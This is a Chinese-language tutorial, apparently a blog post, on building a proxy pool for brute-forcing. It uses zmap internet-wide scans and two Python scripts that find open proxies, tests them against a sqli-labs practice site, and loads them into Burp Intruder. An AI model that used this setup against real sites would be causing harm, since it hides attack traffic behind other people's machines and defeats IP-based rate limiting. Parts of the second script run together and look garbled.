基本步骤
1.使用 zmap 爬取大量代理ip
2.使用py1脚本初步筛选可用ip
3.利用py2脚本再次筛选对目标网站可用ip(不带payload安全检测)
4.配置 burp 插件并加载收集到的代理池
5.加载payload,开始爆破
Zmap
kali安装
sudo apt update
apt install zmap
zmap --version
爬取
zmap -p 80 -o ips80.txt
开另一个终端
zmap -p 443 -o ips443.txt
扫久一点为ip筛选作准备
Python
py1 初步筛选,这里的 raw_ips.txt 放刚刚扫描出的结果
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
# 指定输入和输出文件路径
raw_input_file = 'raw_ips.txt' # 原始包含逗号的IP文件
processed_output_file = 'ip.txt' # 字符处理后的IP文件
available_proxy_file_path = 'InProxyPool.txt' # 可用代理输出文件
# 多个验证URL,包含国内和国外常见网站,用于更严格地验证代理IP是否可用
test_urls = [
'http://www.baidu.com',
'http://www.jd.com/',
'http://www.taobao.com/'
]
# 线程锁
lock = threading.Lock()
# 标记是否是第一次写入可用代理文件,初始化为True表示第一次
first_write = True
def replace_comma_with_colon(raw_input_file, output_file):
"""
替换文件中逗号为冒号,并保存到新文件。
"""
with open(raw_input_file, 'r') as file:
lines = file.readlines()
# 替换逗号为冒号
modified_lines = [line.replace(',', ':').strip() for line in lines]
# 写入新的文件,'w'模式会自动清空原有内容再写入
with open(output_file, 'w') as file:
for line in modified_lines:
file.write(line + '\n')
print(f"IP格式处理完成,结果已保存到 {output_file}")
# IP添加:端口号
def add_port_to_ips(input_file_path, output_file_path, port=80):
try:
with open(input_file_path, 'r') as infile, open(output_file_path, 'w') as outfile:
for line in infile:
ip = line.strip() # 去除每行的空白字符(如换行符等)
new_ip = f"{ip}:{port}"
outfile.write(new_ip + "\n")
except FileNotFoundError:
print(f"输入文件 {input_file_path} 不存在,请检查文件路径。")
验证之后形成第⼀代理池,但是⽤到⽬标⽹站还是会有许多其他的状态码,不能访问的错误,所以我们针对
⽬标指定⽹站再进⾏筛选
def test_proxy(proxy):
"""
测试单个代理IP是否可用,通过多个URL验证,只有全部验证通过才认定可用,并实时写入文件。
"""
global first_write
proxy = proxy.strip() # 移除行尾的换行符
if not proxy: # 跳过空行
return None
# 设置代理
proxies_dict = {
'http': f'http://{proxy}',
'https': f'https://{proxy}'
}
is_available = True
for url in test_urls:
try:
# 发送请求,设置超时时间为5秒
response = requests.get(url, proxies=proxies_dict, timeout=5)
if response.status_code!= 200:
is_available = False
break
except requests.RequestException as e:
is_available = False
break
if is_available:
print(f'代理IP {proxy} 可用')
with lock:
# 根据是否第一次写入来决定文件打开模式
mode = 'w' if first_write else 'a'
with open(available_proxy_file_path, mode) as file:
file.write(f'{proxy}\n')
if first_write:
first_write = False # 第一次写入后标记设为False
return proxy
else:
print(f'代理IP {proxy} 不可用')
return None
def main():
# 第一步:处理IP文件
# replace_comma_with_colon(raw_input_file, processed_output_file)
add_port_to_ips(raw_input_file,processed_output_file)
# 第二步:读取替换后的IP文件,验证代理IP
with open(processed_output_file, 'r') as file:
proxies = file.readlines()
# 使用ThreadPoolExecutor并发执行
with ThreadPoolExecutor(max_workers=20) as executor:
future_to_proxy = {executor.submit(test_proxy, proxy): proxy for proxy in proxies}
for future in as_completed(future_to_proxy):
proxy = future_to_proxy[future]
try:
future.result() # 触发验证逻辑
except Exception as e:
print(f'代理IP {proxy} 验证过程中出现错误: {e}')
print(f"\n代理验证完成,可用代理IP已写入文件: {available_proxy_file_path}")
if __name__ == "__main__":
main()
得到第一ip池 InProxyPool.txt
py2 二次筛选,针对目标网站进行安全测试
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
import sysimport io# 设置标准输出的编码为utf-8sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')# 最小响应包长度
MIN_LENGTH = 100
# 最大线程数
MAX_WORKERS = 100
# 输出文件路径
OUTPUT_FILE_PATH = 'FProxies.txt'
# 输入文件路径
input_file_path = 'InProxyPool.txt'def check_proxy(proxy):"""验证代理网址"""'''对目标网站测试,不带payload的安全测试'''test_url = "https://sqli-labs.bachang.org/Less-1/"proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}try:response = requests.get(test_url, proxies=proxies, timeout=2)if response.status_code == 200 and len(response.content) >= MIN_LENGTH:return proxy # 返回可用代理except Exception:passreturn None # 无效代理def validate_proxy(proxy, lock):"""验证单个代理并写入文件"""valid_proxy = check_proxy(proxy)if valid_proxy:with lock:with open(OUTPUT_FILE_PATH, 'w') as outfile:outfile.write(f"{valid_proxy}\n")print(f"有效代理: {valid_proxy}")else:print(f"无效代理: {proxy}")def validate_proxies_from_file(input_file_path):"""从文件中读取代理并验证其有效性,同时将有效代理输出到另一个文件"""lock = threading.Lock()with open(input_file_path, 'r') as infile:proxies = [line.strip() for line in infile]with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:futures = [executor.submit(validate_proxy, proxy, lock) for proxy in proxies]for future in as_completed(futures):future.result() # 等待所有任务完成validate_proxies_from_file(input_file_path)
得到第二 ip 池 FProxies.txt (可能还需要筛选)
burp
配置 python 环境
加载 Python 扩展
启用扩展并加载ip池
Intruder里加载好payload即可进行爆破。
(错误示范,因为我的ip池还不够大不够有效)
可以另寻查找其他构建代理池的方法
又菜~~~~~~~又爱~~~~~~~~~~玩·~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~